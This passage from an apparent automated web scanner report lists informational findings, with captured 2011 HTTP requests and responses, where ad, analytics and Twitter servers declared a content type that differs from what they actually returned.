The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /www/e9/07/w2/1y/objembed.html/@@1307040897@@ HTTP/1.1
Host: adserv.impactengine.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Date: Fri, 10 Jun 2011 04:34:00 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 02 Jun 2011 19:39:26 GMT
Accept-Ranges: bytes
Content-Length: 19918
Content-Type: text/html; charset=UTF-8
Age: 33665
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: 91c428fd03566b5d36ebf664631aba8b594a8b9c07fa5e38d02f138a9fb96f3f3c7107d92758aaae
Via: 1.0 0d78cb56da368c171e069e4444b2cbf6.cloudfront.net:11180 (CloudFront), 1.0 0a864114bbd5655c745ca701bc25e858.cloudfront.net:11180 (CloudFront)
Connection: keep-alive

var eventString;
var activityViewerReady;
//
var mouseEvent                         = null;
var eventLogContainer                 = null;
var offsetPositionX                     = 0;
var offsetPositionY                     = 0;
var showLogFooter                     =
...[SNIP]...

26.8. http://adserver.veruta.com/cookiematch.fcgi previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://adserver.veruta.com
Path:	/cookiematch.fcgi

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /cookiematch.fcgi?pnid=3000003&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=567&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: adserver.veruta.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/aboutcontact-us/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmid=20772879917; ueid=1461734246|1305465412|8|2; lpnid=3000003

Response

26.9. http://amch.questionmarket.com/adscgen/st.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://amch.questionmarket.com
Path:	/adscgen/st.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

26.10. http://api.mixpanel.com/track/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://api.mixpanel.com
Path:	/track/

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /track/?data=eyJldmVudCI6ICJWaXNpdCBNdWx0aSIsInByb3BlcnRpZXMiOiB7InRva2VuIjogImNkMGE0ZTFmZDhkOWQyMmE4NDYzMGNiMjgwZDI1OTM5IiwidGltZSI6IDEzMDc5NjM2NTQsImRpc3RpbmN0X2lkIjogIjE4NTMxOTY2OCIsIm1lZGl1bSI6ICJhZmZpbGlhdGUiLCJhZmZpbGlhdGUiOiB0cnVlLCJwdWJsaXNoZXIiOiAibWF2cyIsImNhbXBhaWduIjogImxpbmsiLCJrZXl3b3JkIjogIm1hdmVyaWNrcy10aWNrZXRzIiwid2lkZ2V0IHRlbXBsYXRlIjogIiJ9fQ%3D%3D&ip=1&callback=mpq.metrics.jsonp_callback&_=1307963654725 HTTP/1.1
Host: api.mixpanel.com
Proxy-Connection: keep-alive
Referer: http://www.tiqiq.com/Tiqiq/PublisherHomePage.aspx?PerformerIds=513;InclAwayGames&PublisherID=1011031&BrandID=Empty&EventCount=5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Mon, 13 Jun 2011 11:14:15 GMT
Content-Type: text/javascript
Connection: close
Vary: Accept-Encoding
Expires: Mon, 13 Jun 2011 11:14:14 GMT
Access-Control-Max-Age: 1728000
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Allow-Headers: X-Requested-With
Content-Length: 30

mpq.metrics.jsonp_callback(1);

26.11. http://api.twitter.com/1/dallasmavs/lists/mavs-insiders/statuses.json previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://api.twitter.com
Path:	/1/dallasmavs/lists/mavs-insiders/statuses.json

Issue detail

The response contains the following Content-type statement:

Content-Type: application/json; charset=utf-8

The response states that it contains JSON. However, it actually appears to contain plain text.

Request

GET /1/dallasmavs/lists/mavs-insiders/statuses.json?callback=TWTR.Widget.receiveCallback_1&since_id=80244846329217024&refresh=true&include_rts=true&clientsource=TWITTERINC_WIDGET&1307967079384=cachebust HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://www.nba.com/mavericks/index_main.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=43838368.1305663457.3.2.utmcsr=kosmix.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=43838368.1598605414.1305368954.1306579970.1306582526.7; k=173.193.214.243.1307962966384201; guest_id=130796296639680752; original_referer=Bm9gjDJKLkNUA6KUQhqcURlVnkat6%2FAa0nQJRijFpP696HbzgOR%2BrPDoOcSsLUsQqgRs7aQNlpGXT0Ue1ThS%2BnB2T6v43msK; _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCIoBq4gwAToHaWQiJTY3MzNhYWQwMGYwZGZh%250AM2RjMzRjNGI0YmM4ODI3OGQ2IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--e8cfadc4dddd72c57b26f1ed5cab8aa85cb06060; external_referer=Bm9gjDJKLkNUA6KUQhqcUTdiRGCASXVaz08YGXkOHWMzPBOM8BKQu4ZyXL5mG7%2BW%7C0

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 12:14:20 GMT
Server: hi
Status: 200 OK
X-Transaction: 1307967260-97424-49280
X-RateLimit-Limit: 150
ETag: "c4496a2500a04acae94431807a040161"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Mon, 13 Jun 2011 12:14:20 GMT
X-RateLimit-Remaining: 146
X-Runtime: 0.02237
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef1145421744e
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 8ece342890506cba5a4e6871f362681cb0e81ef0
X-RateLimit-Reset: 1307970679
Vary: Accept-Encoding
Content-Length: 34
Connection: close

TWTR.Widget.receiveCallback_1([]);

26.12. http://api.twitter.com/1/fansided/lists/fansided-nba/statuses.json previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://api.twitter.com
Path:	/1/fansided/lists/fansided-nba/statuses.json

Issue detail

The response contains the following Content-type statement:

Content-Type: application/json; charset=utf-8

The response states that it contains JSON. However, it actually appears to contain plain text.

Request

GET /1/fansided/lists/fansided-nba/statuses.json?callback=TWTR.Widget.receiveCallback_1&since_id=80236513723559936&refresh=true&include_rts=true&clientsource=TWITTERINC_WIDGET&1307967108977=cachebust HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://fansided.com/category/nba/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=43838368.1305663457.3.2.utmcsr=kosmix.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=43838368.1598605414.1305368954.1306579970.1306582526.7; k=173.193.214.243.1307962966384201; guest_id=130796296639680752; original_referer=Bm9gjDJKLkNUA6KUQhqcURlVnkat6%2FAa0nQJRijFpP696HbzgOR%2BrPDoOcSsLUsQqgRs7aQNlpGXT0Ue1ThS%2BnB2T6v43msK; _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCIoBq4gwAToHaWQiJTY3MzNhYWQwMGYwZGZh%250AM2RjMzRjNGI0YmM4ODI3OGQ2IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--e8cfadc4dddd72c57b26f1ed5cab8aa85cb06060; external_referer=Bm9gjDJKLkNUA6KUQhqcUTdiRGCASXVaz08YGXkOHWMzPBOM8BKQu4ZyXL5mG7%2BW%7C0

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 12:14:49 GMT
Server: hi
Status: 200 OK
X-Transaction: 1307967289-83031-4820
X-RateLimit-Limit: 150
ETag: "c4496a2500a04acae94431807a040161"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Mon, 13 Jun 2011 12:14:49 GMT
X-RateLimit-Remaining: 103
X-Runtime: 0.02579
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef1145421744e
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: b63412f79d667eef1330b49dd2f5c54d74ef8647
X-RateLimit-Reset: 1307970679
Vary: Accept-Encoding
Content-Length: 34
Connection: close

TWTR.Widget.receiveCallback_1([]);

26.13. http://api.uproxx.com/ulink/template.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://api.uproxx.com
Path:	/ulink/template.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /ulink/template.js HTTP/1.1
Host: api.uproxx.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/tv/game-of-thrones-baelor-preview
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:09:10 GMT
Server: Apache
Pragma: public
Cache-Control: maxage=1209600
Expires: Mon, 27 Jun 2011 11:09:10 GMT
Vary: Accept-Encoding
Content-Length: 2009
Content-Type: text/plain; charset=UTF-8

function ulink_format_number(nStr) {
   nStr += '';
   x = nStr.split('.');
   x1 = x[0];
   x2 = x.length > 1 ? '.' + x[1] : '';
   var rgx = /(\d+)(\d{3})/;
   while (rgx.test(x1)) {
       x1 = x1.replace(rgx, '$1'
...[SNIP]...

26.14. http://ar.voicefive.com/b/rc.pli previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ar.voicefive.com
Path:	/b/rc.pli

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteraction&n=ar_int_p20101109&1307963612571 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://cas.ny.us.criteo.com/delivery/afr.php?zoneid=11794&bannerid=15313&did=e2781b91d4&rtb=6&z=A806B85E716068DA&b=_QvwWPOmF9qsK5gj17cW6Aw%253d%253d&u=|nNCLaCHwmN07U4DRUZ0pHdqixMoMjXJxX2u8Zm/PtPU=|&bi=|nNCLaCHwmN0J5w24FyGsdH++TaD0GtSWalTZURlH6HtA06wdvExd4w==|&rl=~02-D56D73BBE04E7C6C5FBFD05DE07AB42148F56B7C-1-1-1-1----499220b078520fd232c6c82d63fe5ed76e555f74~&ep=%7cnNCLaCHwmN35Kg6IthAYnOokjl6jAJDuWARTH7zdO09d4gvwAj4xCPeQctduIb%2fu%7c&c=JgKZmjcgVQ2W2rfCWnzvGF49VVUAC02887GqDp9AuJ4fvT1Q-IkeHtZuTAgKG5GXWKbQcBCiB0nIjB-bwwvoITNGelXJ6ciB2QssfATJuE8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; BMX_BR=pid=p20101109&prad=11794&arc=15313&exp=1307963601; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; BMX_3PC=1; UID=4a757a7-24.143.206.42-1305663172; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1307963602%2E056%2Cwait%2D%3E10000%2C

Response

26.15. http://as.jivox.com/player/jivox_ad_tags.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://as.jivox.com
Path:	/player/jivox_ad_tags.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /player/jivox_ad_tags.php?t=1307962892856&r=0.9127810774371028&objectName=jvxAdPlayer&serverName=http://as.jivox.com&iframeTag=on&siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg&adVideoURL= HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://as.jivox.com/player/iabplayer.php?siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com&mouseAction=mouseOver
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

26.16. http://as.jivox.com/unit/jivox_unit_tags.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://as.jivox.com
Path:	/unit/jivox_unit_tags.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /unit/jivox_unit_tags.php?t=1307962878675&r=0.39272111374884844&objectName=jvxAdPlayer_894&creativeUnitType=1&expandUnitType=1&siteId=24bbcd13d37379&campaignId=19628&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aTJsZjFubyhnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkUUY4SU9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMm1pbG1ibGMpKQ/2/*http://www.nealtire.com/&mouseAction=mouseOver HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:01:19 GMT
Server: Apache/2.2.6 (Fedora)
X-Powered-By: PHP/5.1.6
Content-Length: 32335
Connection: keep-alive

GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxUnit(){
var creativeUnitType = '1';
var
...[SNIP]...

26.17. http://beacon.videoegg.com/btf previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://beacon.videoegg.com
Path:	/btf

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /btf?rid=13088b4e73678c7ed7ce9906d8646347&area=FSV_300X250&si=FSV_300X250&pb=FantasySportsVentures&fv=10.3.181&curtime=1307963617308&curtz=300&ord=3 HTTP/1.1
Host: beacon.videoegg.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/z-the-fort-worth-four/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:21:44 GMT
ETag: "598007-6-d7b03f80"
Last-Modified: Fri, 02 Apr 2010 00:13:02 GMT
Server: Apache
Content-Length: 6
Connection: keep-alive

"a7";

26.18. http://beacon.videoegg.com/initjs previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://beacon.videoegg.com
Path:	/initjs

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /initjs?pb=FantasySportsVentures&si=FSV_300X250&area=FSV_300X250&dim=300x250&loc=FSV_300X250_ROS_300X250&pl=x&rid=13088b4f4e8fdb3db8584adcd205a526&tech=admanager&curtime=1307963618536&curtz=300&ord=1 HTTP/1.1
Host: beacon.videoegg.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/z-the-fort-worth-four/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:13:39 GMT
ETag: "3b800b-6-73d47000"
Last-Modified: Wed, 29 Sep 2010 08:07:28 GMT
Server: Apache
Content-Length: 6
Connection: keep-alive

"a1";

26.19. http://beacon.videoegg.com/invpos previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://beacon.videoegg.com
Path:	/invpos

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /invpos?rid=13088b4f4e8fdb3db8584adcd205a526&winwidth=1065&winheight=926&adtop=785&adleft=645&curtime=1307963618624&curtz=300&ord=2 HTTP/1.1
Host: beacon.videoegg.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/z-the-fort-worth-four/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:13:39 GMT
ETag: "4f0007-6-d92172c0"
Last-Modified: Tue, 11 May 2010 19:51:15 GMT
Server: Apache
Content-Length: 6
Connection: keep-alive

"a2";

26.20. http://bes-clck.com/v previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://bes-clck.com
Path:	/v

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /v?i=1$AgAAAAAAAAADAAAAAAAAAAIAAAAAylA8k9-1oO-A8lG38AhNYr2z33d3bvOwOgiPaI.BW8C541YVEv4McStFFe662zGg3WmwqHyNHXFZ9AWvPRkM9lsZOJFgafZIV7NhMjqHXYKgVFM2hFzf.R6upJSJ84EQRpHGMiRGg3dvtLKhWuDSt11YfUVS5NA8Sv.WuBfN-yRBYRz9KNgHliZCFROzl.MNHz8o6HzZQV2tFKBzCe-3CR6KolMQAG3Wbtvy18WxikbzMS2jE0Z4FVIVMycHS.JTusBvTFCTGlWuOFQqLXivXy9dNSOhhDMvo5gPXmpPrYC7O7uCvdyeb9Uu-QQQI4vuYaqfIOPgNWAiLRz5EUu23elMRN9vO4kubDsMXf4CIuG1xdj5IdyUQLLWmiprDgNoHv0N.bgbiHUn6lhYkItaWLND935Z1HwnsOUk24ifhLCFvXGidQzlwZuuwYNBUtLKbXes8sMKL6XHijZ3Fz-OMmlIAe0d-sbhaQqLRAO8p3oz3iWz1hXE2LGxwl1P4fiYr-YloLA7S5Lva4hpVqSQ1Mh8.uleDiGLZpJ0PF5KNMth1kunYjTqv-mcdfBpSb3J6Ssc.Y--oBU5drLsWn-HfaTCrXTabsNsSActGmRveBg8GK8N.7MXCmeWReKC.WsbnpXgtot29Zq7jFWuDVGmfBEUfN2A8eYZPk.qI7KPZQkBgZhLp6e86hst7wRUmEZocZVrTQ__ HTTP/1.1
Host: bes-clck.com
Proxy-Connection: keep-alive
Referer: http://www.imdb.com/title/tt0944947/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 2
Date: Mon, 13 Jun 2011 11:26:08 GMT
Server: Server

{}

26.21. http://bs.serving-sys.com/BurstingPipe/adServer.bs previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/adServer.bs

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

26.22. http://cdn.apture.com/media/searchfilter.khtml.v33513556.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://cdn.apture.com
Path:	/media/searchfilter.khtml.v33513556.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /media/searchfilter.khtml.v33513556.js HTTP/1.1
Host: cdn.apture.com
Proxy-Connection: keep-alive
Referer: http://cdn.apture.com/media/html/aptureLoadIframe.html?v=33513556
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AC=s4te21hWKP

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:18:54 GMT
Server: PWS/1.7.2.3
X-Px: ht iad-agg-n33.panthercdn.com
P3P: CP="NON CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa HISa OUR LEG UNI COM NAV INT"
Cache-Control: max-age=604800
Expires: Thu, 16 Jun 2011 18:33:54 GMT
Age: 319500
Content-Length: 4080
Content-Type: application/x-javascript
Vary: Accept-Encoding
Px-Uncompress-Origin: 4080
Last-Modified: Thu, 09 Jun 2011 18:22:56 GMT
Connection: keep-alive

apture.fileCache.load("searchfilter", "if(window.apture.It)window.apture.It.Wt=/\\b(be~?an~?er|qu~?ee~?f|mo~?th~?er~?fu~?ck~?s|ej~?ac~?ul~?at~?ed|cu~?nt~?li~?ck~?er|as~?sh~?ol~?es|mi~?lf|pe~?ni~?s|pi~
...[SNIP]...

26.23. http://cdn.triggertag.gorillanation.com/js/4600_US.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://cdn.triggertag.gorillanation.com
Path:	/js/4600_US.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /js/4600_US.php HTTP/1.1
Host: cdn.triggertag.gorillanation.com
Proxy-Connection: keep-alive
Referer: http://www.tvfanatic.com/2011/06/game-of-thrones-review-baelor/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (EL)
X-Powered-By: PHP/5.2.6
X-Served-By: app1v-php1.lax1
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 326
Cache-Control: max-age=268
Date: Mon, 13 Jun 2011 11:18:02 GMT
Connection: close

// 2011-6-13 6:0:1 EST
f309518=1;f309516=1;f362152=1;f362154=1;f309526=1;f309524=1;f362160=1;f362162=1;f309522=1;f309520=1;f362144=1;f362146=1;f309514=1;f309512=0;f361998=0;f362000=0;f312159=1;f312155
...[SNIP]...

26.24. http://cdn2.sbnation.com/profile_images/435869/a7d63d06_small.jpg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://cdn2.sbnation.com
Path:	/profile_images/435869/a7d63d06_small.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /profile_images/435869/a7d63d06_small.jpg HTTP/1.1
Host: cdn2.sbnation.com
Proxy-Connection: keep-alive
Referer: http://www.mavsmoneyball.com/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
